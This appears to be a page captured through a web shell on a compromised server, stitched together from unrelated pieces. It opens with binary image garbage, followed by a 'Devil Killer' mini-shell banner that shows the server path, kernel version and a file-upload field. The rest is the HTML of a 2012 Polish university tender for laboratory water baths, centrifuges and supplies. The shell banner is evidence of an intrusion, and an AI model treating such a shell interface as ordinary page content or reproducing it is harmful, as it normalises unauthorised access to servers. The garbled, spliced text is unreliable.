JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120824/183661-N-2012.html

<p class="kh_header"><b>Wrocław: Dostawa drobnego sprzętu laboratoryjnego, materiałów i surowców dla projektu: Geokompozyty sorbujące wodę-innowacyjne technologie wspomagające wegetację roślin współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013, Działanie 1.3, Poddziałanie 1.3.1, nr umowy UDA-POIG. 01.03.01-00-181/09-06.


1.	Dostawa  łaźni wodnych dwumiejscowych.
2.	Dostawa wirówek stołowych z wymiennymi wirnikami.
3.	Dostawa materiałów i surowców laboratoryjnych.
Nr sprawy RAP.272.125.2012</b><br>
<b>Numer ogłoszenia: 183661 - 2012; data zamieszczenia: 24.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Przyrodniczy we Wrocławiu , ul. C.K. Norwida 25/27, 50-375 Wrocław, woj. dolnośląskie, tel. 071 3283576, 3205496, faks 071 3283576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.up.wroc.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Zamawiajacy nie ustanawia dynamicznego systemu zakupów</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa drobnego sprzętu laboratoryjnego, materiałów i surowców dla projektu: Geokompozyty sorbujące wodę-innowacyjne technologie wspomagające wegetację roślin współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013, Działanie 1.3, Poddziałanie 1.3.1, nr umowy UDA-POIG. 01.03.01-00-181/09-06.


1.	Dostawa  łaźni wodnych dwumiejscowych.
2.	Dostawa wirówek stołowych z wymiennymi wirnikami.
3.	Dostawa materiałów i surowców laboratoryjnych.
Nr sprawy RAP.272.125.2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa drobnego sprzętu laboratoryjnego, materiałów i surowców dla projektu: Geokompozyty sorbujące wodę-innowacyjne technologie wspomagające wegetację roślin współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013, Działanie 1.3, Poddziałanie 1.3.1, nr umowy UDA-POIG. 01.03.01-00-181/09-06.

Część nr 1: Dostawa  łaźni wodnych dwumiejscowych.
Część nr 2: Dostawa wirówek stołowych z wymiennymi wirnikami.
Część nr 3: Dostawa materiałów i surowców laboratoryjnych.

1. CZĘŚĆ NR 1 Dostawa  łaźni wodnych dwumiejscowych.
1.1.Wymagania Zamawiającego dotyczące przedmiotu zamówienia:

a)	Przedmiotem zamówienia jest: dostawa  łaźni wodnych dwumiejscowych.

b)	Miejscem dostawy jest: Zakład Mikrobiologii Rolniczej, Plac Grunwaldzki 24A, 50-363 Wrocław.

c)	 Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 3a do SIWZ.

d)	Szczegółowy opis realizacji przedmiotu zamówienia stanowi załącznik nr 4a do SIWZ (projekt umowy)

e)	 Oferowany sprzęt musi być fabrycznie nowy, aktualnie produkowany i dostępny na rynku.

f)	  Wykonawca będzie zobowiązany dołączyć do każdego dostarczonego sprzętu instrukcję obsługi w języku polskim oraz karty gwarancyjne zgodnie z wymogami SIWZ.

g)	 Wykonawca będzie zobowiązany do dołączenia Deklaracji Zgodności (CE) przy dostawie sprzętu.

h)	  W ramach ceny ofertowej Wykonawca będzie zobowiązany do dostawy, instalacji, uruchomienia sprzętu 
w siedzibie Zamawiającego oraz przeszkolenia pracowników Zamawiającego w zakresie uruchomienia i obsługi sprzętu.



1.2 Wymagania Zamawiającego dotyczące warunków gwarancji:

a) wymagana przez Zamawiającego długość okresu gwarancji:  24 miesięcy.

Okres gwarancji liczy się od dnia zainstalowania dostarczonego sprzętu i bezusterkowego przekazania przedmiotu zamówienia, przez co rozumie się dzień podpisania protokołu  jego odbioru technicznego,

b) Wykonawca zapewni serwis gwarancyjny przez okres gwarancji,

c) czas naprawy - do 14 dni kalendarzowych  licząc od dnia zgłoszenia,

d) w przypadku dwóch napraw tego samego modułu lub usterek tego samego typu w okresie gwarancji Wykonawca będzie zobowiązany dokonać wymiany sprzętu na nowy, liczba ta nie obejmuje napraw wynikających z niewłaściwej eksploatacji oraz działania sił wyższych,

e) transport sprzętu do miejsca lokalizacji serwisu gwarancyjnego i z powrotem w okresie gwarancji odbywać się będzie na koszt i ryzyko Wykonawcy,

f) każda naprawa gwarancyjna przedłuża gwarancję o czas przerwy w eksploatacji sprzętu.

1.3 Wykonawca zobowiązuje się dostarczyć zamówiony towar własnym transportem i na własny koszt. Dostawa będzie realizowana bezpośrednio do siedziby Zamawiającego tj. do Zakładu Mikrobiologii Rolniczej, Plac Grunwaldzki 24A, 50-363 Wrocław.

1.4 Zakres przedmiotu zamówienia winien być zrealizowany zgodnie z obowiązującymi  normami i przepisami.

1.5 Zamawiający zgodnie z art. 36 ust. 4 ustawy żąda wskazania przez Wykonawcę w ofercie części zamówienia, których wykonanie powierzy podwykonawcom.

2. CZĘŚĆ NR 2 Dostawa wirówek stołowych z wymiennymi wirnikami.
2.1 .Wymagania Zamawiającego dotyczące przedmiotu zamówienia:


a)	Przedmiotem zamówienia jest: dostawa wirówek stołowych z wymiennymi wirnikami.

Miejscem dostawy jest: Zakład Mikrobiologii Rolniczej, Plac Grunwaldzki 24A, 50-363 Wrocław

b)	 Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 3b do SIWZ.

c)	Szczegółowy opis realizacji przedmiotu zamówienia znajduje się w załączniku nr 4b do SIWZ (projekt umowy)

d)	 Oferowany sprzęt musi być fabrycznie nowy, aktualnie produkowany i dostępny na rynku.

e)	 Wykonawca będzie zobowiązany dołączyć do każdego dostarczonego sprzętu instrukcję obsługi w języku polskim oraz karty gwarancyjne zgodnie z wymogami SIWZ.

f)	 Wykonawca będzie zobowiązany do dołączenia Deklaracji Zgodności (CE) przy dostawie sprzętu.

g)	  W ramach ceny ofertowej Wykonawca będzie zobowiązany do dostawy, instalacji, uruchomienia sprzętu 
w siedzibie Zamawiającego oraz przeszkolenia pracowników Zamawiającego w zakresie uruchomienia i obsługi sprzętu.


2.2.	Wymagania Zamawiającego dotyczące warunków gwarancji:

a) wymagana przez Zamawiającego długość okresu gwarancji:  24 miesięcy.

Okres gwarancji liczy się od dnia zainstalowania dostarczonego sprzętu i bezusterkowego przekazania przedmiotu zamówienia, przez co rozumie się dzień podpisania protokołu  jego odbioru technicznego,

b) Wykonawca zapewni serwis gwarancyjny przez okres gwarancji,

c) czas naprawy - do 14 dni kalendarzowych  licząc od dnia zgłoszenia,

d) w przypadku dwóch napraw tego samego modułu lub usterek tego samego typu w okresie gwarancji Wykonawca będzie zobowiązany dokonać wymiany sprzętu na nowy, liczba ta nie obejmuje napraw wynikających z niewłaściwej eksploatacji oraz działania sił wyższych,

e) transport sprzętu do miejsca lokalizacji serwisu gwarancyjnego i z powrotem w okresie gwarancji odbywać się będzie na koszt i ryzyko Wykonawcy,

f) każda naprawa gwarancyjna przedłuża gwarancję o czas przerwy w eksploatacji sprzętu.

2.3 Wykonawca zobowiązuje się dostarczyć zamówiony towar własnym transportem i na własny koszt. Dostawa będzie realizowana bezpośrednio do siedziby Zamawiającego tj. do Zakładu Mikrobiologii Rolniczej, Plac Grunwaldzki 24A, 50-363 Wrocław.

2.4 Zakres przedmiotu zamówienia winien być zrealizowany zgodnie z obowiązującymi  normami i przepisami.

2.5 Zamawiający zgodnie z art. 36 ust. 4 ustawy żąda wskazania przez Wykonawcę w ofercie części zamówienia, których wykonanie powierzy podwykonawcom.

3. CZĘŚĆ NR 3 Dostawa  materiałów i surowców laboratoryjnych
Wymagania Zamawiającego dotyczące przedmiotu zamówienia:

a)	Przedmiotem zamówienia jest: Dostawa  materiałów i surowców laboratoryjnych.
Miejscem dostawy są: Katedry Uniwersytetu Przyrodniczego mieszczące się przy Placu Grunwaldzkim 24A, 50-363 Wrocław.

b)	 Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 3c do SIWZ.
c)	Szczegółowy opis realizacji przedmiotu umowy znajduje się w załączniku nr 4c do SIWZ (projekt umowy)

d)	 Oferowany asortyment musi być fabrycznie nowy, w oryginalnych opakowaniach producenta.

e)	Wykonawca zobowiązuje się dostarczyć zamówiony towar własnym transportem i na własny koszt bezpośrednio do siedzib jednostek organizacyjnych Uniwersytetu Przyrodniczego we Wrocławiu, na podstawie złożonego formalnie zamówienia przez pracowników Zamawiającego na piśmie, faxem lub mailem.

f)	Wykonawca gwarantuje właściwą konstrukcję, jakość użytych materiałów, właściwe wykonanie i zgodność z normami, jak również kompletność przedmiotu umowy, zgodnie z opisem przedmiotu zamówienia, stanowiącym załączniki nr 3c SIWZ,

g)	Wykonawca udzieli Zamawiającemu gwarancji na okres 12 miesięcy.

h)	Okres gwarancji liczy się od dnia przekazania przedmiotu zamówienia, tj. od dnia podpisania protokołu  jego odbioru.

i)	Odbiór danej partii asortymentu zostanie przeprowadzony w dniu dostawy przedmiotu zamówienia. 

j)	Protokół odbioru zostanie sporządzony w 2 egzemplarzach, po 1 egzemplarzu dla każdej ze stron i podpisany przez obie strony. Za odbiór strony uznają podpisanie przez uprawnionych przedstawicieli stron protokołu odbioru bez  uwag.

k)	W przypadku stwierdzenia podczas odbioru technicznego usterek lub odstępstw od wymagań określonych 
w SIWZ w tym załączniku nr 3c do SIWZ (załącznik nr 2 do umowy), Wykonawca zobowiązuje się do niezwłocznego ich usunięcia lub dokonania zmian zgodnie z opisem. W takim przypadku zostanie sporządzony protokół o stwierdzonych usterkach lub odstępstwach w 2 egzemplarzach, po 1 dla każdej ze stron i podpisany przez obie strony. W protokole tym strony ustalają dodatkowy termin odbioru materiału. Ustęp ten nie wyłącza postanowień  dotyczących kar umownych i odstąpienia od umowy. 

l)	Jeżeli w okresie gwarancji ujawnią się lub zostaną wykryte wady przedmiotu zamówienia, Wykonawca zobowiązany jest do ich nieodpłatnej naprawy lub wymiany na wolne od wad, czas naprawy zgłoszonej usterki - do 7 dni od daty doręczenia reklamacji Wykonawcy w formie pisemnej, za pośrednictwem faksu lub pocztą elektroniczną. W szczególnych przypadkach terminy te mogą za zgodą Zamawiającego ulec przedłużeniu.

m)	Odbiór przedmiotu zamówienia dokona minimum 1 przedstawiciel Zamawiającego w obecności, co najmniej 1 przedstawiciela Wykonawcy. 

n)	Wykonawca odpowiada za dostarczony przez siebie przedmiot umowy do czasu odbioru przez Zamawiającego.

o)	Wykonawca zobowiązany jest dostarczyć wraz z dostawą przedmiotu zamówienia następującą dokumentację w języku polskim: kartę gwarancyjną, instrukcje obsługi dla użytkowników.

3.2 Zakres przedmiotu zamówienia winien być zrealizowany zgodnie z obowiązującymi  normami i przepisami.

3.3 Wykonawca zobowiązuje się dostarczyć zamówiony towar własnym transportem i na własny koszt. Dostawa będzie realizowana bezpośrednio do siedziby Zamawiającego tj. do Katedr Uniwersytetu Przyrodniczego mieszczących się przy Placu Grunwaldzkim 24A, 50-363 Wrocław.

3.4 Zamawiający dopuszcza możliwość niewykorzystania całości ilości poszczególnych asortymentów podanych 
w arkuszu kalkulacyjnym, stanowiącym załącznik nr 3c do SIWZ. W przypadku nie wyczerpania przez Zamawiającego, w okresie trwania umowy asortymentu i ilości produktów, wykonawca nie będzie rościć żadnych żądań wobec Zamawiającego

3.4 Zakres przedmiotu zamówienia winien być zrealizowany zgodnie z obowiązującymi  normami i przepisami.

3.5 Zamawiający zgodnie z art. 36 ust. 4 ustawy żąda wskazania przez Wykonawcę w ofercie części zamówienia, których wykonanie powierzy podwykonawcom.

3.6 Dopuszcza się zakończenie realizacji umowy w terminie wcześniejszym w przypadku zakupienia przez Zamawiającego całego asortymentu będącego przedmiotem zamówienia lub wcześniejszego wyczerpania wartości umowy przed upływem 90 dni od daty zawarcia umowy. (Taka zmiana terminu realizacji umowy nie wymaga zawarcia aneksu).

3.7.Termin dostaw zamawianej partii asortymentu: do 21 dni kalendarzowych licząc od daty złożenia zamówienia przez Zamawiającego pisemnie, faksem lub pocztą internetową u Wykonawcy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.94.30.00-8, 42.93.11.20-8, 38.00.00.00-5, 38.43.70.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ NR 1, CZĘŚĆ NR 2, CZĘŚĆ NR 3
Zamawiający nie ustanawia szczegółowych warunków udziału w postępowaniu w ww.zakresie dla Części nr 1, Części nr 2, Części nr 3 i nie dokonuje opisu sposobu oceny ich spełniania. Wykonawca złoży w tym zakresie jedynie oświadczenie o spełnieniu warunków udziału w postępowaniu stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ NR 1, CZĘŚĆ NR 2, CZĘŚĆ NR 3
Zamawiający nie ustanawia szczegółowych warunków udziału w postępowaniu w ww.zakresie dla Części nr 1, Części nr 2, Części nr 3 i nie dokonuje opisu sposobu oceny ich spełniania. Wykonawca złoży w tym zakresie jedynie oświadczenie o spełnieniu warunków udziału w postępowaniu stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ NR 1, CZĘŚĆ NR 2, CZĘŚĆ NR 3
Zamawiający nie ustanawia szczegółowych warunków udziału w postępowaniu w ww.zakresie dla Części nr 1, Części nr 2, Części nr 3 i nie dokonuje opisu sposobu oceny ich spełniania. Wykonawca złoży w tym zakresie jedynie oświadczenie o spełnieniu warunków udziału w postępowaniu stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ NR 1, CZĘŚĆ NR 2, CZĘŚĆ NR 3
Zamawiający nie ustanawia szczegółowych warunków udziału w postępowaniu w ww.zakresie dla Części nr 1, Części nr 2, Części nr 3 i nie dokonuje opisu sposobu oceny ich spełniania. Wykonawca złoży w tym zakresie jedynie oświadczenie o spełnieniu warunków udziału w postępowaniu stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ NR 1, CZĘŚĆ NR 2, CZĘŚĆ NR 3
Zamawiający nie ustanawia szczegółowych warunków udziału w postępowaniu w ww.zakresie dla Części nr 1, Części nr 2, Części nr 3 i nie dokonuje opisu sposobu oceny ich spełniania. Wykonawca złoży w tym zakresie jedynie oświadczenie o spełnieniu warunków udziału w postępowaniu stanowiące załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. CZĘŚĆ NR 1, CZĘŚĆ NR 2
1.1. Oświadczenie o spełnieniu warunków udziału w postępowaniu stanowiące załącznik nr 2 do SIWZ.

1.2. Zgodnie z art. 26 ust. 2b ustawy Pzp wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne (w oryginale) zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Dokumenty te Wykonawcy składający ofertę wspólnie składają wspólnie.

Treść zobowiązania podmiotu trzeciego powinna określać: kto jest podmiotem przyjmującym zasoby, zakres zobowiązania podmiotu trzeciego, czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie ono wykonane, w tym jakiego okresu dotyczy. A w sytuacji, gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia.

W przypadku, gdy Wykonawca dla potwierdzenia spełnienia warunku udziału w postępowaniu dotyczącego posiadania wiedzy i doświadczenia powołuje się na doświadczenie podmiotu trzeciego    i  przedstawia  posiadane  przez  ten  podmiot  referencje,  wymagany  jest  udział   tego   podmiotu   w realizacji zamówienia. W takim przypadku w ofercie należy przedstawić (w oryginale) oświadczenie lub inny dokument tego podmiotu z którego wynika, że będzie brał on udział w realizacji zamówienia. Dokumenty te Wykonawcy składający ofertę wspólnie składają wspólnie.

W przypadku, gdy Wykonawca w ofercie powołał się na doświadczenie podmiotu trzeciego przy wykazaniu spełnienia warunku doświadczenia i podmiot ten uczestniczy w realizacji zamówienia, np. jako podwykonawca, niedopuszczalna jest zmiana tego podmiotu na etapie realizacji zamówienia.

1.3.	Wypełniony i podpisany formularz ofertowy wg załącznika nr 1 do SIWZ.

1.4.	 Ewentualne pełnomocnictwo.

1.5.	Wypełniony i podpisany arkusz pn. : Parametry techniczne przedmiotu zamówienia - załącznik nr 3a lub/i 3b do SIWZ (w zależności której części dotyczy składana oferta przez Wykonawcę),

Wykonawca jest zobowiązany do wypełnienia kolumny parametry oferowane, w której musi wpisać w sposób jednoznaczny dane techniczne oferowanego asortymentu
1.6.Wymagania związane ze złożeniem oferty wspólnej:
W przypadku grupy przedsiębiorców działających w formie spółki cywilnej lub w formie konsorcjum (składających ofertę wspólnie) należy przedstawić w ofercie pełnomocnictwo ustanawiające pełnomocnika do reprezentowania Wykonawców/wspólników w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być wystawione w formie, o której mowa w rozdziale V pkt. 5 SIWZ.

W złożonej ofercie wspólnej przez kilka podmiotów każdy z nich zobowiązany jest przedstawić dokumenty wystawione na niego wymienione w rozdziale V dla Części nr 1, Części nr 2 punkt 9.2 i 9.3. Dokumenty określone w rozdziale V SIWZ dla Części nr 1, Części nr 2, w punktach 9.1, 9.4, 9.5, 9.6 poszczególne podmioty składają wspólnie, tj. warunki w nich określone zostaną spełnione, gdy podmioty składające wspólną ofertę spełnią je łącznie. 

Oświadczenie Wykonawcy (zał. nr 2 do SIWZ) musi być podpisane przez wszystkich członków konsorcjum, wspólników spółki cywilnej lub osobę wskazaną w pełnomocnictwie. Formularz ofertowy (zał. nr 1 do SIWZ) musi być wypełniony 
i podpisany przez osobę upoważnioną do reprezentowania Wykonawców/wspólników.
Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.

2. CZĘŚĆ NR 3
2.1.Oświadczenie o spełnieniu warunków udziału w postępowaniu stanowiące załącznik nr 2 do SIWZ.

